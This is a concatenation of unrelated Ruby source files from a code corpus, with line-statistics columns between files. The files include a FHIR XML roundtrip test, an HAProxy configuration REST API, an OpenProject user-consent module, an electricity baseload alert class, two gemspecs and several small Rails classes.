define_method("test_xml_format_#{example_name}") do
run_xml_roundtrip_test(example_file, example_name)
end
define_method("test_xml_json_xml_lossiness_#{example_name}") do
run_xml_json_xml_lossiness_test(example_file, example_name)
end
end
def run_xml_roundtrip_test(example_file, example_name)
input_xml = File.read(example_file)
resource = FHIR::STU3::Xml.from_xml(input_xml)
output_xml = resource.to_xml
input_nodes = Nokogiri::XML(input_xml)
output_nodes = Nokogiri::XML(output_xml)
clean_nodes(input_nodes.root)
clean_nodes(output_nodes.root)
errors = calculate_errors(input_nodes, output_nodes)
unless errors.empty?
File.open("#{ERROR_DIR}/#{example_name}.err", 'w:UTF-8') { |file| file.write(errors.map { |x| "#{x.first} #{x.last.to_xml}" }.join("\n")) }
File.open("#{ERROR_DIR}/#{example_name}_PRODUCED.xml", 'w:UTF-8') { |file| file.write(output_xml) }
File.open("#{ERROR_DIR}/#{example_name}_ORIGINAL.xml", 'w:UTF-8') { |file| file.write(input_xml) }
end
assert errors.empty?, 'Differences in generated XML vs original'
# check memory
before = check_memory
resource = nil
wait_for_gc
after = check_memory
assert_memory(before, after)
end
def run_xml_json_xml_lossiness_test(example_file, example_name)
input_xml = File.read(example_file)
resource_from_xml = FHIR::STU3::Xml.from_xml(input_xml)
output_json = resource_from_xml.to_json
resource_from_json = FHIR::STU3::Json.from_json(output_json)
output_xml = resource_from_json.to_xml
input_nodes = Nokogiri::XML(input_xml)
output_nodes = Nokogiri::XML(output_xml)
clean_nodes(input_nodes.root)
clean_nodes(output_nodes.root)
errors = calculate_errors(input_nodes, output_nodes)
unless errors.empty?
File.open("#{ERROR_LOSSY_DIR}/#{example_name}.err", 'w:UTF-8') { |file| file.write(errors.map { |x| "#{x.first} #{x.last.to_xml}" }.join("\n")) }
File.open("#{ERROR_LOSSY_DIR}/#{example_name}_PRODUCED.xml", 'w:UTF-8') { |file| file.write(output_xml) }
File.open("#{ERROR_LOSSY_DIR}/#{example_name}_ORIGINAL.xml", 'w:UTF-8') { |file| file.write(input_xml) }
end
assert errors.empty?, 'Differences in generated XML vs original'
# check memory
before = check_memory
resource_from_xml = nil
resource_from_json = nil
wait_for_gc
after = check_memory
assert_memory(before, after)
end
def calculate_errors(input_nodes, output_nodes)
errors = input_nodes.diff(output_nodes, added: true, removed: true).to_a
errors.keep_if do |error|
# we do not support the preservation of comments, ignore them
is_comment = (error.last.class == Nokogiri::XML::Comment)
# we do not care about empty whitespace
is_empty_text = (error.last.class == Nokogiri::XML::Text && error.last.text.strip == '')
!(is_comment || is_empty_text)
end
# we do not care about preservation of trailing zeros
# on numbers. Remove things from the error list like "1.5" != "1.50"
left = []
right = []
errors.each do |error|
if error.first == '-'
left << error
else
right << error
end
end
regex = /-?([0]|([1-9][0-9]*))(\\.[0-9]+)?/
left.each_with_index do |error, index|
right_error = right[index]
two_numerics = ((error.last.value =~ regex) && (right_error.last.value =~ regex))
if two_numerics && (error.last.value.to_f == right_error.last.value.to_f)
errors.delete(error)
errors.delete(right_error)
end
end
# return the remaining errors
errors
end
# process input to remove leading and trailing newlines and whitespace around text
def clean_nodes(node)
node.children.each do |child|
child.content = child.content.strip if child.is_a?(Nokogiri::XML::Text)
if child.has_attribute?('value')
# remove all the children -- these will be primitive extensions which we do not support.
child.children = ''
end
clean_nodes(child) unless child.children.empty?
end
end
end
| 37.846154 | 151 | 0.690447 |
2615bd6bda36c281602692ce0185b27af7d635d4 | 717 | class TreeBuilderOpsDiagnostics < TreeBuilderOps
private
def tree_init_options(_tree_name)
{
:open_all => true,
:leaf => "Diagnostics"
}
end
def set_locals_for_render
locals = super
locals.merge!(:autoload => true)
end
def root_options
region = MiqRegion.my_region
title = _("%{product} Region: %{region_description} [%{region}]") % {:region_description => region.description,
:region => region.region,
:product => I18n.t('product.name')}
[title, title, '100/miq_region.png']
end
end
| 29.875 | 120 | 0.504881 |
4a4b0235c2d2c1598309e420f5a64f86d13414e7 | 994 | class Staff::TwentySevenForm
include ActiveModel::Model
attr_accessor :twenty_seven
delegate :persisted?, :save, to: :twenty_seven
def initialize(twenty_seven = nil)
@twenty_seven = twenty_seven
@twenty_seven ||= TwentySeven.new
end
def assign_attributes(params = {})
@params = params
twenty_seven.assign_attributes(twenty_seven_params)
end
private
def twenty_seven_params
@params.require(:twenty_seven).permit(:m_1, :m_2, :m_3, :c_1, :m_4, :m_5, :m_6, :c_2, :m_7, :m_8, :m_9, :c_3, :m_10, :m_11, :m_12, :c_4, :transfer_m_1, :transfer_m_2, :transfer_m_3, :transfer_c_1, :transfer_m_4, :transfer_m_5, :transfer_m_6, :transfer_c_2, :transfer_m_7, :transfer_m_8, :transfer_m_9, :transfer_c_3, :transfer_m_10, :transfer_m_11, :transfer_m_12, :transfer_c_4, :pt_special_1, :pt_special_2, :pt_special_3, :pt_special_4, :pt_special_5, :pt_special_6, :pt_special_7, :pt_special_8, :pt_special_9, :pt_special_10, :pt_special_11, :pt_special_12)
end
end | 47.333333 | 566 | 0.741449 |
2627b34feb13ac6c46a8c290f9be14b89b09fe5e | 3,137 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
##
# Intended to be used by the AccountController to implement the user consent
# check.
module Accounts::UserConsent
include ::UserConsentHelper
def consent
if consent_required?
render 'account/consent', locals: { consenting_user: consenting_user }
else
consent_finished
end
end
def confirm_consent
user = consenting_user
if user.present? && consent_param?
approve_consent!(user)
else
reject_consent!
end
end
def consent_required?
# Ensure consent is enabled and a text is provided
return false unless user_consent_required?
# Require the user to consent if he hasn't already
consent_expired?
end
def decline_consent
message = I18n.t('consent.decline_warning_message') + "\n"
message <<
if Setting.consent_decline_mail
I18n.t('consent.contact_this_mail_address', mail_address: Setting.consent_decline_mail)
else
I18n.t('consent.contact_your_administrator')
end
flash[:error] = message
redirect_to authentication_stage_failure_path :consent
end
def consent_expired?
consented_at = consenting_user.try(:consented_at)
# Always if the user has not consented
return true if consented_at.blank?
# Did not expire if no consent_time set, but user has consented at some point
return false if Setting.consent_time.blank?
# Otherwise, expires when consent_time is newer than last consented_at
consented_at < Setting.consent_time
end
def consenting_user
User.find_by id: session[:authenticated_user_id]
end
def approve_consent!(user)
user.update_column(:consented_at, DateTime.now)
consent_finished
end
def consent_finished
redirect_to authentication_stage_complete_path(:consent)
end
def reject_consent!
flash[:error] = I18n.t('consent.failure_message')
redirect_to authentication_stage_failure_path :consent
end
end
| 29.87619 | 95 | 0.744661 |
016e20b528af0cef03570f41db5b8b6adce72bbb | 1,082 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'logfile_interval/version'
Gem::Specification.new do |spec|
spec.name = "logfile_interval"
spec.version = LogfileInterval::VERSION
spec.authors = ["Philippe Le Rohellec"]
spec.email = ["[email protected]"]
spec.description = "Logfile parser and aggregator"
spec.summary = "Aggregate logfile data into intervals"
spec.homepage = "https://github.com/plerohellec/logfile_interval"
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^spec/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "byebug", [">= 0"] if RUBY_VERSION >= '2.0.0'
spec.add_development_dependency "rspec", ["~> 2.14.0"]
spec.add_development_dependency "rake"
spec.add_development_dependency "simplecov"
end
| 40.074074 | 79 | 0.680222 |
21decd3d45957c6ff7496640c95c296b72e821a0 | 4,616 | class Workout < ActiveRecord::Base
attr_accessor :intensity
belongs_to :log_entry
has_many :completed_workouts, :dependent => :destroy
has_many :planned_workouts, :dependent => :destroy
has_many :messages, :dependent => :destroy
accepts_nested_attributes_for :completed_workouts
accepts_nested_attributes_for :planned_workouts
accepts_nested_attributes_for :messages
default_scope {order('time ASC', 'id ASC')}
amoeba do
enable
end
def is_empty_workout
empty = true
if self.messages.size > 0
empty = false
end
self.completed_workouts.each do |completed_workout|
if completed_workout.summary != nil || completed_workout.workout_times.size > 0
empty = false
end
end
self.planned_workouts.each do |planned_workout|
if planned_workout.instructions != "" || planned_workout.planned_workout_times.size > 0
empty = false
end
end
return empty
end
def total_completed_zones
zones = {}
if self.completed_workouts.first != nil
self.completed_workouts.first.workout_times.each do |workout_time|
if zones[workout_time.zone] == nil
zones[workout_time.zone] = workout_time.duration
else
zones[workout_time.zone] = zones[workout_time.zone] += workout_time.duration
end
end
end
return zones
end
def total_planned_zones
zones = {}
if self.planned_workouts.first != nil
self.planned_workouts.first.planned_workout_times.each do |workout_time|
if zones[workout_time.zone] == nil
zones[workout_time.zone] = workout_time.duration
else
zones[workout_time.zone] = zones[workout_time.zone] += workout_time.duration
end
end
end
return zones
end
def has_intensity
intensity = false
unless self.completed_workouts.first == nil
if self.completed_workouts.first.workout_times.where('zone > ?', 1).size > 0
intensity = true
else
intensity = false
end
end
unless self.planned_workouts.first == nil
if self.planned_workouts.first.planned_workout_times.where('zone > ?', 1).size > 0
intensity = true
end
end
return intensity
end
def self.total_completed(id)
total = 0
entry = Workout.find(id)
entry.completed_workouts.each do |workout|
workout.workout_times.each do |time|
total += time.duration
end
end
return total
end
def total_completed
total = 0
self.completed_workouts.each do |workout|
workout.workout_times.each do |time|
unless time.duration == nil
total += time.duration
end
end
end
return total
end
def total_planned
total = 0
self.planned_workouts.each do |planned_workout|
planned_workout.planned_workout_times.each do |time|
unless time.duration == nil
total += time.duration
end
end
end
return total
end
def self.total_planned(id) #find where used and change syntax
total = 0
entry = Workout.find(id)
entry.planned_workouts.each do |planned_workout|
planned_workout.planned_workout_times.each do |time|
total += time.duration
end
end
return total
end
def self.instructions(id)
entry = Workout.find(id)
instructions = entry.planned_workouts.first.instructions
return instructions
end
def self.intensities(id)
entry = Workout.find(id)
intensities = entry.completed_workouts.first.workout_times.where('zone > ?', 1)
return intensities
end
def self.planned_intensities(id)
entry = Workout.find(id)
intensities = entry.planned_workouts.first.planned_workout_times.where('zone > ?', 1)
return intensities
end
#fix AM PM to integer
def self.convert_am_pm
Workout.all.each do |workout|
if workout.time_of_day == "AM"
workout.time = 1
elsif workout.time_of_day == "PM"
workout.time = 2
else
workout.time = 1
end
workout.save
end
end
#calculate effort level
def effort_level
total_compeleted = self.total_completed
total_planned = self.total_planned
if total_completed == 0
total_time = total_planned
else
total_time = total_compeleted
end
short_workout = 0
long_workout = 14400
if total_time <= short_workout
percentage = 0
elsif total_time >= long_workout
percentage = 100
else
percentage = ((total_time - short_workout).to_f/(long_workout - short_workout).to_f*100).to_i
end
return percentage
return total_zones
end
end
| 26.377143 | 99 | 0.678293 |
874d5fd410898f1b26d3d7d131a3681e348b4c0a | 1,575 | require_relative '../test_helper'
class ControllerTest < MiniTest::Test
def setup
@controller = ControllerStub.new
@controller.current_user = :someone
@controller.params = {id: 1, name: 'Hello'}
end
def test_create
# The resource that the controller should create.
obj = Minitest::Mock.new
# Our assertions
obj.expect(:create, obj, [@controller.params])
(ModelStubAction).stub :new, obj do
@controller.create
end
obj.verify
assert(@controller.responded_with === obj, 'Controller should respond with created object')
end
def test_update
# The resource that the controller should create.
obj = Minitest::Mock.new
# Our assertions
obj.expect(:update, obj, [@controller.params])
(ModelStubAction).stub :new, obj do
@controller.update
end
obj.verify
assert(@controller.responded_with === obj, 'Controller should respond with updated object')
end
def test_destroy
# The resource that the controller should create.
obj = Minitest::Mock.new
# Our assertions
obj.expect(:destroy, obj, [])
(ModelStubAction).stub :new, obj do
@controller.destroy
end
obj.verify
assert(@controller.responded_with === obj, 'Controller should respond with destroyed object')
end
def test_exception_handling
e = ActiveRecord::RecordInvalid.new(ModelStubInvalid.new)
@controller.send(:render_invalid, e)
assert_equal(:unprocessable_entity, @controller.rendered[:status])
assert(@controller.rendered[:text].include?('Error'))
end
end | 26.25 | 97 | 0.696508 |
01724caa6976e3415fec7a4d6e0060072a03e7d0 | 839 | # encoding: utf-8
require 'faraday'
require 'bitbucket_rest_api/error'
module BitBucket
class Response::RaiseError < Faraday::Response::Middleware
def on_complete(env)
case env[:status].to_i
when 400
raise BitBucket::Error::BadRequest.new(env)
when 401
raise BitBucket::Error::Unauthorized.new(env)
when 403
raise BitBucket::Error::Forbidden.new(env)
when 404
raise BitBucket::Error::NotFound.new(env)
when 422
raise BitBucket::Error::UnprocessableEntity.new(env)
when 500
raise BitBucket::Error::InternalServerError.new(env)
when 503
raise BitBucket::Error::ServiceUnavailable.new(env)
when 400...600
raise BitBucket::Error::ServiceError.new(env)
end
end
end # Response::RaiseError
end # BitBucket
| 26.21875 | 60 | 0.665077 |
f8ebcb060c14063382ae320c386aa5b8c03efe5d | 600 | require 'httparty'
require 'hashie'
module SgDeliverySlotChecker
module Stores
class Giant
def initialize(postal_code:)
@postal_code = postal_code
end
def available?
get_availability
end
private
attr_reader :postal_code
def get_availability
response = HTTParty.post("https://giant.sg/checkout/cart/checkdelivery", body: { postal_code: postal_code })
slots = response.parsed_response
slots.extend Hashie::Extensions::DeepFind
slots.deep_find_all("available").any?(true)
end
end
end
end
| 20 | 116 | 0.661667 |
38208361c745416a3fa98e44baf20c77d442c373 | 6,496 | require 'sinatra'
require 'json'
require 'webrick'
require 'webrick/https'
require 'openssl'
CERT_PATH = ENV['CERT_PATH']
if CERT_PATH.nil? || !File.exists?(CERT_PATH+'/hapi.crt')
puts "set CERT_PATH env var to where your hapi.crt and hapi.key are"
exit 1
end
webrick_options = {
:Host => "0.0.0.0",
:Port => 443,
:Logger => WEBrick::Log::new($stderr, WEBrick::Log::DEBUG),
:DocumentRoot => "/ruby/htdocs",
:SSLEnable => true,
:SSLVerifyClient => OpenSSL::SSL::VERIFY_NONE,
:SSLCertificate => OpenSSL::X509::Certificate.new( File.open(File.join(CERT_PATH, "/hapi.crt")).read),
:SSLPrivateKey => OpenSSL::PKey::RSA.new( File.open(File.join(CERT_PATH, "/hapi.key")).read),
:SSLCertName => [ [ "CN",WEBrick::Utils::getservername ] ]
}
class HaproxyApi < Sinatra::Base
$haproxy_config = '/etc/haproxy/haproxy.cfg'
if ENV['HAPROXY_CONFIG']
$haproxy_config = ENV['HAPROXY_CONFIG']
end
$mutable_haproxy_config = $haproxy_config + '.haproxy-api.json'
def get_config
return { 'frontend' => {}, 'backend' => {} } if !File.exists?($mutable_haproxy_config)
return JSON.parse(File.read($mutable_haproxy_config))
end
def render(config)
content = ""
f = File.open($haproxy_config, "r")
in_gen_section = false
f.each_line do |line|
if line =~ /HAPROXY_API_GENERATED/
if in_gen_section
in_gen_section = false
else
in_gen_section = true
end
else
if !in_gen_section
content += line
end
end
end
f.close
content += "# HAPROXY_API_GENERATED - START\n"
config['frontend'].each_pair do |name, frontend|
content += "frontend #{name}\n"
content += " bind 0.0.0.0:#{frontend['port']}\n"
if frontend.has_key? 'acls'
port = ''
frontend['acls'].each_pair do |acl,backend_port|
clean_name = acl.gsub('/','_')
content += " acl url_#{clean_name} path_beg #{acl}\n"
content += " use_backend #{name}-#{backend_port}-backend if url_#{clean_name}\n"
port = backend_port
end
content += " default_backend #{name}-#{port}-backend\n"
else
content += " default_backend #{name}-backend\n"
end
content += "\n"
end
config['backend'].each_pair do |name, backend|
content += "backend #{name}\n"
content += " balance #{backend['lbmethod']}\n"
if backend.has_key?('options')
backend['options'].each_pair do |k,v|
content += " option #{k} #{v}\n"
end
end
port = backend['port']
server_options = ""
if backend.has_key?('server_options')
backend['server_options'].each_pair do |k,v|
server_options += "#{k} #{v} "
end
end
backend['servers'].each do |server|
content += " server #{server}:#{port} #{server}:#{port} #{server_options} \n"
end
content += "\n"
end
content += "# HAPROXY_API_GENERATED - END\n"
return content
end
def set_config(config)
ts = Time.now.to_i
`cp #{$haproxy_config} #{$haproxy_config}.#{ts}`
content = render config
File.open($mutable_haproxy_config, 'w') { |file| file.write(JSON.dump(config)) }
File.open($haproxy_config, 'w') { |file| file.write(content) }
result = `/usr/sbin/haproxy -c -f #{$haproxy_config}`
if $?.to_i == 0
puts `systemctl restart haproxy`
else
puts "rolling back config - got:"
puts result
`cp #{$haproxy_config}.#{ts} #{$haproxy_config}`
return status(500)
end
end
def add_acl ( frontend, id, config )
acl = frontend['acl']
backend_port = frontend['backend_port']
if config.has_key?('frontend') && config['frontend'].has_key?(id)
frontend = config['frontend'][id]
end
if !frontend.has_key?('acls')
frontend['acls'] = {}
end
frontend['acls'][acl] = backend_port
end
get '/render' do
config = get_config
render config
end
get '/frontends' do
config = get_config
JSON.dump(config['frontend'])
end
get '/frontend/:id' do
config = get_config
id = params[:id]
return status(404) if !config['frontend'].has_key?(id)
JSON.dump(config['frontend'][id])
end
post '/frontend/:id' do
config = get_config
id = params[:id]
if config['frontend'].has_key?(id)
puts "#{id} already exists - use put"
return status(500)
end
frontend = JSON.parse request.body.read
if frontend.has_key? 'acl'
add_acl frontend, id, config
end
config['frontend'][id] = frontend
set_config config
JSON.dump(frontend)
end
put '/frontend/:id' do
config = get_config
id = params[:id]
frontend = JSON.parse request.body.read
if frontend.has_key? 'acl'
add_acl frontend, id, config
else
config['frontend'][id] = frontend
end
set_config config
JSON.dump(frontend)
end
delete '/frontend/:id' do
config = get_config
config['frontend'].delete params[:id]
set_config config
end
get '/backends' do
config = get_config
JSON.dump(config['backend'])
end
get '/backend/:id' do
config = get_config
id = params[:id] + "-backend"
return status(404) if !config['backend'].has_key?(id)
JSON.dump(config['backend'][id])
end
post '/backend/:id' do
config = get_config
backend = JSON.parse request.body.read
if backend.has_key?('acl')
id = params[:id] + '-' + backend['port'] + "-backend"
else
id = params[:id] + "-backend"
end
if config['backend'].has_key?(id)
puts "#{id} already exists - use put"
return status(500)
end
config['backend'][id] = backend
set_config config
JSON.dump(backend)
end
put '/backend/:id' do
config = get_config
id = params[:id] + "-backend"
backend = JSON.parse request.body.read
config['backend'][id] = backend
set_config config
JSON.dump(backend)
end
delete '/backend/:id' do
config = get_config
config['backend'].delete(params[:id] + "-backend")
set_config config
end
end
Rack::Handler::WEBrick.run HaproxyApi, webrick_options
| 25.47451 | 112 | 0.581589 |
1ccad11ef8827966c97c32c2a5c188de52af5068 | 1,245 | # coding: utf-8
bigdecimal_version = '1.3.5'
Gem::Specification.new do |s|
s.name = "bigdecimal"
s.version = bigdecimal_version
s.authors = ["Kenta Murata", "Zachary Scott", "Shigeo Kobayashi"]
s.email = ["[email protected]"]
s.summary = "Arbitrary-precision decimal floating-point number library."
s.description = "This library provides arbitrary-precision decimal floating-point number class."
s.homepage = "https://github.com/ruby/bigdecimal"
s.license = "ruby"
s.require_paths = %w[lib]
s.extensions = %w[ext/bigdecimal/extconf.rb]
s.files = %w[
bigdecimal.gemspec
ext/bigdecimal/bigdecimal.c
ext/bigdecimal/bigdecimal.h
ext/bigdecimal/depend
ext/bigdecimal/extconf.rb
lib/bigdecimal/jacobian.rb
lib/bigdecimal/ludcmp.rb
lib/bigdecimal/math.rb
lib/bigdecimal/newton.rb
lib/bigdecimal/util.rb
sample/linear.rb
sample/nlsolve.rb
sample/pi.rb
]
s.add_development_dependency "rake", "~> 10.0"
s.add_development_dependency "rake-compiler", ">= 0.9"
s.add_development_dependency "rake-compiler-dock", ">= 0.6.1"
s.add_development_dependency "minitest", "< 5.0.0"
s.add_development_dependency "pry"
end
| 31.125 | 100 | 0.677108 |
081a7806846d7bcd74f696bd7128279987ad87e7 | 7,875 | #======================== Change in Electricity Baseload Analysis =============
require_relative 'alert_electricity_only_base.rb'
class AlertChangeInElectricityBaseloadShortTerm < AlertElectricityOnlyBase
MAXBASELOADCHANGE = 1.15
attr_reader :average_baseload_last_year_kw, :average_baseload_last_week_kw
attr_reader :change_in_baseload_kw, :kw_value_at_10_percent_saving
attr_reader :last_year_baseload_kwh, :last_week_baseload_kwh
attr_reader :last_week_change_in_baseload_kwh, :next_year_change_in_baseload_kwh
attr_reader :last_year_baseload_£, :last_week_baseload_£, :next_year_change_in_baseload_£
attr_reader :one_year_saving_£, :saving_in_annual_costs_through_10_percent_baseload_reduction
attr_reader :predicted_percent_increase_in_usage, :significant_increase_in_baseload
attr_reader :one_year_baseload_chart
def initialize(school)
super(school, :baseloadchangeshortterm)
end
TEMPLATE_VARIABLES = {
average_baseload_last_year_kw: {
description: 'average baseload over last year',
units: :kw
},
average_baseload_last_week_kw: {
description: 'average baseload over last week',
units: :kw
},
change_in_baseload_kw: {
description: 'change in baseload last week compared with the average over the last year',
units: :kw
},
last_year_baseload_kwh: {
description: 'baseload last year (kwh)',
units: {kwh: :electricity}
},
last_week_baseload_kwh: {
description: 'baseload last week (kwh)',
units: {kwh: :electricity}
},
last_week_change_in_baseload_kwh: {
description: 'change in baseload between last week and average of last year (kwh)',
units: {kwh: :electricity}
},
next_year_change_in_baseload_kwh: {
description: 'predicted impact of change in baseload over next year (kwh)',
units: {kwh: :electricity}
},
last_year_baseload_£: {
description: 'cost of the baseload electricity consumption last year',
units: :£
},
last_week_baseload_£: {
description: 'cost of the baseload electricity consumption last week',
units: :£
},
next_year_change_in_baseload_£: {
description: 'projected addition cost of change in baseload next year',
units: :£
},
predicted_percent_increase_in_usage: {
description: 'percentage increase in baseload',
units: :percent
},
significant_increase_in_baseload: {
description: 'significant increase in baseload flag',
units: TrueClass
},
saving_in_annual_costs_through_10_percent_baseload_reduction: {
description: 'cost saving if baseload reduced by 10%',
units: :£
},
kw_value_at_10_percent_saving: {
description: 'kw at 10 percent reduction on last years average baseload',
units: :kw
},
one_year_baseload_chart: {
description: 'chart of last years baseload',
units: :chart
}
}.freeze
def one_year_baseload_chart
:alert_1_year_baseload
end
def timescale
'last week compared with average over last year'
end
def self.template_variables
specific = {'Change In Baseload Short Term' => TEMPLATE_VARIABLES}
specific.merge(self.superclass.template_variables)
end
def calculate(asof_date)
@average_baseload_last_year_kw, _days_sample = annual_average_baseload_kw(asof_date)
@kw_value_at_10_percent_saving = @average_baseload_last_year_kw * 0.9
@average_baseload_last_week_kw = average_baseload(asof_date - 7, asof_date)
@change_in_baseload_kw = @average_baseload_last_week_kw - @average_baseload_last_year_kw
@predicted_percent_increase_in_usage = (@average_baseload_last_week_kw - @average_baseload_last_year_kw) / @average_baseload_last_year_kw
hours_in_year = 365.0 * 24.0
hours_in_week = 7.0 * 24.0
@last_year_baseload_kwh = @average_baseload_last_week_kw * hours_in_year
@last_week_baseload_kwh = @average_baseload_last_week_kw * hours_in_week
@last_week_change_in_baseload_kwh = @change_in_baseload_kw * hours_in_week
@next_year_change_in_baseload_kwh = @change_in_baseload_kw * hours_in_year
@last_year_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @last_year_baseload_kwh
@last_week_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @last_week_baseload_kwh
@next_year_change_in_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @next_year_change_in_baseload_kwh
@saving_in_annual_costs_through_10_percent_baseload_reduction = @last_year_baseload_£ * 0.1
@one_year_saving_£ = Range.new(@next_year_change_in_baseload_£, @next_year_change_in_baseload_£)
@rating = [10.0 - 10.0 * [@predicted_percent_increase_in_usage / 0.3, 0.0].max, 10.0].min.round(1)
@significant_increase_in_baseload = @rating < 7.0
@status = @significant_increase_in_baseload ? :bad : :good
@term = :shortterm
@bookmark_url = add_book_mark_to_base_url('ElectricityBaseload')
end
def default_content
%{
<p>
<% if significant_increase_in_baseload %>
Your electricity baseload has increased.
<% else %>
Your electricity baseload is good.
<% end %>
</p>
<p>
Your electricity baseload was <%= average_baseload_last_week_kw %> this week
compared with an average of <%= average_baseload_last_year_kw %> over the last year.
</p>
<% if significant_increase_in_baseload %>
<p>
If this continues it will costs you an additional <%= one_year_saving_£ %> over the next year.
</p>
<% else %>
<p>
However, if you reduced you baseload by 10 percent from <%= average_baseload_last_year_kw %>
to <%= kw_value_at_10_percent_saving %> by turning appliances off
which have been left on overnight, during weekends and holidays you would save
<%= saving_in_annual_costs_through_10_percent_baseload_reduction %> each year.
</p>
<% end %>
</end>
}.gsub(/^ /, '')
end
def default_summary
%{
<p>
<% if significant_increase_in_baseload %>
Your electricity baseload has increased.
<% else %>
Your electricity baseload is good.
<% end %>
</p>
}.gsub(/^ /, '')
end
def analyse_private(asof_date)
calculate(asof_date)
@average_baseload_last_year_kw, days_sample = annual_average_baseload_kw(asof_date)
@average_baseload_last_week_kw = average_baseload(asof_date - 7, asof_date)
@analysis_report.term = :shortterm
@analysis_report.add_book_mark_to_base_url('ElectricityBaseload')
if @average_baseload_last_week_kw > @average_baseload_last_year_kw * MAXBASELOADCHANGE
@analysis_report.summary = 'Your electricity baseload has increased'
text = sprintf('Your electricity baseload has increased from %.1f kW ', @average_baseload_last_year_kw)
text += sprintf('over the last year to %.1f kW last week. ', @average_baseload_last_week_kw)
cost = BenchmarkMetrics::ELECTRICITY_PRICE * 365.0 * 24 * (@average_baseload_last_week_kw - @average_baseload_last_year_kw)
text += sprintf('If this continues it will costs you an additional £%.0f over the next year.', cost)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 2.0
@analysis_report.status = :poor
else
@analysis_report.summary = 'Your electricity baseload is good'
text = sprintf('Your baseload electricity was %.2f kW this week ', @average_baseload_last_week_kw)
text += sprintf('compared with an average of %.2f kW over the last year.', @average_baseload_last_year_kw)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 10.0
@analysis_report.status = :good
end
@analysis_report.add_detail(description1)
end
end | 40.178571 | 141 | 0.715683 |
21fad3d74c9d20f455fa61934c12a789ba4ce3c6 | 715 | Pod::Spec.new do |s|
s.name = 'AWSCloudWatch'
s.version = '2.9.1'
s.summary = 'Amazon Web Services SDK for iOS.'
s.description = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'
s.homepage = 'http://aws.amazon.com/mobile/sdk'
s.license = 'Apache License, Version 2.0'
s.author = { 'Amazon Web Services' => 'amazonwebservices' }
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/aws/aws-sdk-ios.git',
:tag => s.version}
s.requires_arc = true
s.dependency 'AWSCore', '2.9.1'
s.source_files = 'AWSCloudWatch/*.{h,m}'
end
| 39.722222 | 157 | 0.613986 |
f76964e2c093fcd1cadb3097456f7736d85df961 | 2,150 | describe 'Conditionally required fields', js: true do
before do
login
end
context 'when viewing an empty form' do
let(:draft) { create(:empty_variable_draft, user: User.where(urs_uid: 'testuser').first) }
context 'when viewing a form with always required fields' do
before do
visit edit_variable_draft_path(draft)
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 7)
end
end
context 'when viewing a form with conditionally required fields' do
before do
visit edit_variable_draft_path(draft, 'fill_values')
end
it 'does not display required icons' do
expect(page).to have_no_css('label.eui-required-o')
end
context 'when filling in a form field that causes fields to become required' do
before do
fill_in 'Description', with: 'testing'
find('body').click
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 2)
end
context 'when clearing a field that causes fields to become required' do
before do
fill_in 'Description', with: ''
end
it 'removes the required icons' do
expect(page).to have_no_css('label.eui-required-o')
end
end
end
end
end
context 'when viewing a form with data' do
let(:draft) { create(:full_variable_draft, user: User.where(urs_uid: 'testuser').first) }
context 'when viewing a form with always required fields' do
before do
visit edit_variable_draft_path(draft)
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 7)
end
end
context 'when viewing a form with conditionally required fields' do
before do
visit edit_variable_draft_path(draft, 'fill_values')
end
it 'displays the required icons' do
# 4 because 2 sets of fill_values
expect(page).to have_css('label.eui-required-o', count: 4)
end
end
end
end
| 28.289474 | 94 | 0.637209 |
b98e903c9c469b18207199dc29f16c7a10967ec5 | 670 | module TokenAuthenticatable
extend ActiveSupport::Concern
included do
before_filter :authenticate_player_from_token!
before_filter :authenticate_player!
end
private
def authenticate_player_from_token!
auth_token = params[:auth_token].presence
player = auth_token && Player.find_by_authentication_token(auth_token.to_s)
if player
# Notice we are passing store false, so the player is not
# actually stored in the session and a token is needed
# for every request. If you want the token to work as a
# sign in token, you can simply remove store: false.
sign_in player, store: false
end
end
end
| 25.769231 | 85 | 0.723881 |
28a2586ff8d365c454c7bd9028a9a7c872ad5f61 | 572 | FactoryBot.define do
factory :feedback_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "feedback" }
term
commentable { create(:submission) }
end
factory :notes_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "internal_notes" }
term
commentable { create(:submission) }
end
factory :explanations_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "explanations" }
term
commentable { create(:fixed_evaluation) }
end
end
| 22 | 50 | 0.674825 |
62af6c95fd2e83347c6b7d648bc193ecd770cac3 | 1,959 | #
# Author:: Stephan Renatus <[email protected]>
# Copyright:: Copyright (c) 2016 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
